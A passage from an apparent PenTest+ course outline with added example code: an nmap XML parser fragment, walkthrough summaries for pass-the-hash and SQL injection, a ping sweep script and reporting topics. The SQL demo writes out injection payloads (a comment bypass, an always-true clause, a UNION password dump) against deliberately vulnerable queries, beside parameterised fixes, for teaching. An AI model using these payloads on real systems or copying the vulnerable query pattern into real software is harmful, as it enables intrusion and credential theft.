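            for r in rows for sid, out in r["scripts"].items() if out]


if __name__ == "__main__":
    rows = parse_nmap_xml(SAMPLE_NMAP_XML)
    for r in open_ports(rows):
        print(f"{r['ip']}:{r['port']}/{r['proto']} {r['service']:<5} {r['product']} "
              f"({r['method']}, conf {r['confidence']})")
    for ip, port, sid, out in script_findings(rows):
        print(f"  [{sid}] {ip}:{port} {out}")
```

Swap SAMPLE_NMAP_XML for the contents of a real -oX file; the same structure holds for scans of hundreds of hosts, which is the point of not working from the screen output.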
Scenario Walkthrough 27: Executing a Pass-the-Hash Attack
In this scenario walkthrough, we'll perform a pass-the-hash attack using a password hash in place of a cracked password. We'll start by getting a Meterpreter shell, then running Meterpreter's hashdump script to get account hashes on the target. Then we'll use Metasploit and the psexec module to perform the pass-the-hash attack and get a new Meterpreter shell on our target.
Scenario Walkthrough 28: Performing a SQL Injection Attack
In this scenario walkthrough, we will take a look at SQL injection and how we can manipulate a vulnerable website into showing us data that we shouldn't have access to.
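An added example serving both the injection overview in section 3.4 and this walkthrough (example code, not the course's lab application): a login and a search function built by string formatting, beside the parameterised versions that fix them, against an in-memory SQLite database with constructed rows. The quote in the input becomes part of the SQL in the vulnerable versions, which is the whole bug; with parameters the driver sends values separately from the statement text and a quote is just a character. The plaintext password column exists only so the UNION leak is visible; a real application stores password hashes.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """In-memory stand-in for a web application's user table; the rows are
    constructed for this example (passwords stored in clear only so the
    leak below is visible; never do this for real)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        [("alice", "Wonderland1!", "admin"),
         ("bob", "hunter2", "user"),
         ("carol", "correct-horse", "user")],
    )
    return conn


def login_vulnerable(conn, username: str, password: str):
    """Statement built by string formatting: a quote in the input closes the
    literal and the rest of the input is executed as SQL."""
    query = (f"SELECT username, role FROM users "
             f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(query).fetchall()


def search_vulnerable(conn, term: str):
    """Same defect in a search box; a UNION pulls columns the page never meant to show."""
    query = f"SELECT username, role FROM users WHERE username LIKE '%{term}%'"
    return conn.execute(query).fetchall()


def login_hardened(conn, username: str, password: str):
    """Parameterised statement: values travel separately from the SQL text."""
    query = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchall()


def search_hardened(conn, term: str):
    return conn.execute(
        "SELECT username, role FROM users WHERE username LIKE ?", (f"%{term}%",)
    ).fetchall()


if __name__ == "__main__":
    db = build_db()
    print(login_vulnerable(db, "alice'--", "wrong"))           # logs in as admin: '--' comments out the password check
    print(login_vulnerable(db, "' OR '1'='1", "' OR '1'='1"))  # every row
    print(search_vulnerable(db, "%' UNION SELECT username, password FROM users --"))
    print(login_hardened(db, "alice'--", "wrong"))             # []
```

The two payloads above are the classic forms you will see in the course: `alice'--` turns the rest of the WHERE clause into a comment, and the UNION payload bolts a second SELECT onto the query, which works because both return two columns.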
4.4 Analyzing Basic Scripts
Analyzing Scripts in Bash, PowerShell, Python, and Ruby
In this video, we will analyze ping sweep scripts written in Bash, PowerShell, Python, and Ruby. We'll also discuss some scripting basics, such as defining variables and using loops.
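As an added example of the ping sweep this video analyzes (example code, not one of the course's scripts): a Python version that expands a CIDR block, pings the hosts concurrently through the system ping binary, and takes the pinger as a parameter so the sweep logic can be exercised offline with a fake one. The function names are this example's own; the ping flags follow Linux and Windows conventions and are called out where they differ.

```python
import ipaddress
import platform
import subprocess
import sys
from concurrent.futures import ThreadPoolExecutor


def expand_targets(cidr: str):
    """Usable host addresses in a block; ip_network drops the network and
    broadcast addresses for you, which a hand-rolled loop often forgets."""
    net = ipaddress.ip_network(cidr, strict=False)
    return [str(h) for h in net.hosts()]


def ping_once(host: str, timeout_s: int = 1) -> bool:
    """One ICMP echo through the system ping binary, since raw ICMP sockets
    need root. Flags differ by platform: -n/-w (milliseconds) on Windows,
    -c/-W on Linux (seconds; on macOS -W is in milliseconds, so adjust)."""
    if platform.system().lower().startswith("win"):
        cmd = ["ping", "-n", "1", "-w", str(timeout_s * 1000), host]
    else:
        cmd = ["ping", "-c", "1", "-W", str(timeout_s), host]
    try:
        done = subprocess.run(cmd, stdout=subprocess.DEVNULL,
                              stderr=subprocess.DEVNULL, timeout=timeout_s + 2)
        return done.returncode == 0
    except (subprocess.TimeoutExpired, FileNotFoundError):
        return False


def ping_sweep(cidr: str, pinger=ping_once, workers: int = 32):
    """Sweep a block concurrently and return the hosts that answered.
    `pinger` is injectable so the logic can run without a network."""
    targets = expand_targets(cidr)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(pinger, targets))
    return [t for t, up in zip(targets, results) if up]


if __name__ == "__main__":
    if len(sys.argv) > 1:
        for host in ping_sweep(sys.argv[1]):
            print(f"{host} is up")
    else:
        # Offline demo: pretend .1 (the gateway) and .101 answer.
        fake = lambda h: h.endswith(".1") or h == "192.168.56.101"
        print(ping_sweep("192.168.56.0/24", pinger=fake))
```

A host that blocks ICMP is reported as down, which is the same blind spot the Bash and PowerShell versions have; when that matters, follow the sweep with a TCP scan (nmap -Pn) against the addresses that stayed silent.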
5.0 Reporting and Communications
5.1 Report Writing and Handling
Report Writing and Handling Best Practices
In this video, we'll discuss data normalization and the proper format of a pentest report. We will also go over report handling and learn about risk appetite.
5.2 Post-Report Delivery Activities
Delivery and Post-Delivery
In this video, we'll discuss pentest report delivery and go over what should happen during a report delivery meeting. We will also cover what happens post-delivery, such as any necessary follow-up tasks.
5.3 Mitigating Discovered Vulnerabilities
Vulnerability Mitigation Strategies
In this video, we'll discuss mitigation strategies, including solutions for people, process, and technology. We will also talk about the secure software development lifecycle.
5.4 Communicating During the Penetration Testing Process
The Importance of Communications
In this video, we'll review the importance of effective communication during a penetration test. We'll discuss communications paths, communication triggers, and goal reprioritization.
Taking the PenTest+ Certification Exam
Congratulations, you've made it to the end of the course! Now it's time to get certified. This video goes over important information about the CompTIA PenTest+ certification exam and walks you through how to schedule the exam.